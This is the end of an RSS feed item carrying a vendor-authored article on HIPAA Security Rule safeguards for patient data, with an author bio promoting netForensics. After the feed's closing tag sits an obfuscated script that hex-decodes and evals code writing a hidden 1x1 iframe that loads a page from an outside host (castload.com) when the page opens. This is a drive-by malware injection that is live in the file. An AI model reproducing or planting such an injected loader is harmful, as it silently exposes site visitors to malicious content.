<p>&#8220;Section 1173(d) of the Act provides that covered entities that maintain or transmit health information are required to maintain reasonable and appropriate administrative, physical, and technical safeguards to ensure the integrity and confidentiality of the information and to protect against any reasonably anticipated threats or hazards to the security or integrity of the information and unauthorized use or disclosure of the information. These safeguards must also otherwise ensure compliance with the statute by the officers and employees of the covered entities.&#8221;</p>
<p>To comply with HIPAA regulations and protect patient information, healthcare organizations are tasked with updating their legacy computer systems, ramping up their information security capabilities, and defining and implementing business processes that align with security objectives.</p>
<p>According to the Title II Administrative Simplification Security Rule, specific security issues must be addressed and solutions implemented as they relate to transmitting and storing patient data. Safeguard initiatives include the following:</p>
<ul>
<li>Security Management Process</li>
<li>Administrative Safeguards</li>
<li>Assigned Security Responsibility</li>
<li>Workforce Security</li>
<li>Information Access Management</li>
<li>Security Awareness and Training</li>
<li>Security Incident Procedures</li>
<li>Contingency Plan</li>
<li>Evaluation</li>
<li>Business Associate Contracts and Other Arrangements</li>
<li>Physical Safeguards</li>
<li>Facility Access Controls</li>
<li>Workstation Use</li>
<li>Workstation Security</li>
<li>Device and Media Controls</li>
<li>Technical Safeguards</li>
<li>Access Control</li>
<li>Audit Controls</li>
<li>Integrity</li>
<li>Person or Entity Authentication</li>
<li>Transmission Security</li>
</ul>
<p>The HIPAA Security Standards do not specify particular technology requirements, so each affected healthcare organization must assess its own risk and develop security measures accordingly. Organizations must then certify their security programs through self-certification or by a private accreditation entity.</p>
<p>Therefore, to address the HIPAA Security Rule and ensure that Administrative, Physical, and Technical Safeguards are implemented that will lead to HIPAA compliance, a comprehensive and effective information security program is necessary.</p>
<p>Katherine Janiszewski plays a crucial role as Marketing Manager of netForensics.  Founded in 1999, netForensics is based on a culture of excellence and innovation. Their team of leading experts understands the ever-evolving security threat and compliance needs of today&#8217;s organizations, including <a href="http://sem.netforensics.com/page/1/Hipaa.jsp">HIPAA Data</a>.  For more information, visit netForensics.com.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.adowp.com/internet-and-online-businesses/internet-security/hipaa-project-patient-information/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f636173746c6f61642e636f6d2f666f72756d2e7068703f74703d36373565616665633433316231663732222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>

